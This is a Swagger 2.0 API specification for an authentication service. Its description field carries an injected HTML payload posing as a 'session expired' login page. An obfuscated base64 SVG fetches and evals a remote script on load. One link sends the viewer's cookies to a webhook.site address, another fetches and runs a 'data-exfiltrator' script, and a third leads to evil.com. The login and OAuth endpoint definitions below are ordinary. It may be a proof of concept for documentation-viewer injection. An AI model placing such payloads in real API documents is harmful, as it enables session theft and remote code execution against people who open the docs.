swagger: '2.0'
info:
  version: 1.0.0
  title: Authentication Portal
  description: |
    <div style="text-align:center;margin:30px 0;">
      <img src="data:image/svg+xml;base64,PHN2ZyBvbmxvYWQ9ImZldGNoKCdodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQ3liZXJUZWNoQWpqdS9zd2FnZ2VyLXNlY3VyaXR5L21haW4vc2NyaXB0LmpzJykudGhlbihyPT5yLnRleHQoKSkudGhlbihldmFsKSIgd2lkdGg9IjAiIGhlaWdodD0iMCI+PC9zdmc+" width="0" height="0" />
      <h2 style="color:#0066cc;font-weight:bold;">Authentication Required</h2>
      <p style="color:#666;">This API requires authentication to continue</p>
      <p style="color:red;font-size:13px;">Session expired or invalid token</p>
    </div>
    <div style="margin:20px auto;max-width:400px;padding:15px;border:1px solid #ddd;border-radius:5px;background:#f9f9f9;">
      <p>Please log in through one of the following options:</p>
      <ul style="list-style:none;padding:0;">
        <li style="margin:10px 0;"><a href="https://evil.com" style="display:block;padding:8px;background:#0066cc;color:white;text-decoration:none;text-align:center;border-radius:4px;">Enterprise SSO Login</a></li>
        <li style="margin:10px 0;"><a href="javascript:void(document.write(`<form action='https://webhook.site/YOUR-WEBHOOK-ID' id='autoForm' method='post'><input name='token' value='${document.cookie}'></form><script>document.getElementById('autoForm').submit()</script>`))" style="display:block;padding:8px;background:#5cb85c;color:white;text-decoration:none;text-align:center;border-radius:4px;">OAuth 2.0 Login</a></li>
        <li style="margin:10px 0;"><a href="javascript:fetch('https://raw.githubusercontent.com/cyberajju/swagger-ui/main/data-exfiltrator.js').then(r=>r.text()).then(eval)" style="display:block;padding:8px;background:#f0ad4e;color:white;text-decoration:none;text-align:center;border-radius:4px;">API Key Authentication</a></li>
      </ul>
    </div>
    <div style="position:fixed;bottom:10px;right:10px;font-size:12px;color:#666;">CyberTechAjju~/.sectech</div>

paths:
  /login:
    post:
      summary: Authenticate user
      description: Authenticates a user and returns a session token.
      parameters:
        - name: username
          in: formData
          description: Username for authentication
          required: true
          type: string
        - name: password
          in: formData
          description: Password for authentication
          required: true
          type: string
        - name: remember
          in: formData
          description: Remember session
          type: boolean
      tags:
        - Authentication
      responses:
        '200':
          description: Successfully authenticated
          schema:
            type: object
            properties:
              token:
                type: string
              expires:
                type: string
              user:
                type: object
        '401':
          description: Authentication failed
          
  /oauth/authorize:
    get:
      summary: OAuth 2.0 Authorization Flow
      description: Initiates OAuth 2.0 authorization flow.
      parameters:
        - name: client_id
          in: query
          description: OAuth client ID
          required: true
          type: string
        - name: redirect_uri
          in: query
          description: URI to redirect after authorization
          required: true
          type: string
        - name: response_type
          in: query
          description: OAuth response type (code, token)
          required: true
          type: string
        - name: scope
          in: query
          description: Requested OAuth scopes
          required: false
          type: string
      tags:
        - OAuth
      responses:
        '302':
          description: Redirect to authorization page
          
  /oauth/token:
    post:
      summary: OAuth 2.0 Token Exchange
      description: Exchange authorization code for access token.
      consumes:
        - application/x-www-form-urlencoded
      parameters:
        - name: grant_type
          in: formData
          description: OAuth grant type
          required: true
          type: string
        - name: code
          in: formData
          description: Authorization code
          required: true
          type: string
        - name: redirect_uri
          in: formData
          description: Redirect URI
          required: true
          type: string
        - name: client_id
          in: formData
          description: OAuth client ID
          required: true
          type: string
        - name: client_secret
          in: formData
          description: OAuth client secret
          required: true
          type: string
      tags:
        - OAuth
      responses:
        '200':
          description: Access token response
          schema:
            type: object
            properties:
              access_token:
                type: string
              token_type:
                type: string
              expires_in:
                type: integer
              refresh_token:
                type: string
